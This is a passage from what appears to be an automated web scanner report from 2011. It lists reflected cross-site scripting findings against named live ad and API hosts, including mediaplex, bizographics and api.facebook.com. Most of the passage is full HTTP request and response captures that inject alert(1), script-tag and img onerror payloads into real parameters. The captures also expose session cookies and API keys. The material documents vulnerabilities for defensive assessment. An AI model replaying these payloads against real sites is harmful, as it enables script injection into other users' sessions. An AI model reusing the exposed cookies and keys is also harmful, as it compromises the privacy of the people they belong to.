Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

3.92. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

3.93. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

3.94. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

3.95. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.96. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)

3.97. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

3.98. http://api.echoenabled.com/v1/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

3.99. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

3.100. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

3.101. http://api.facebook.com/restserver.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

3.102. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
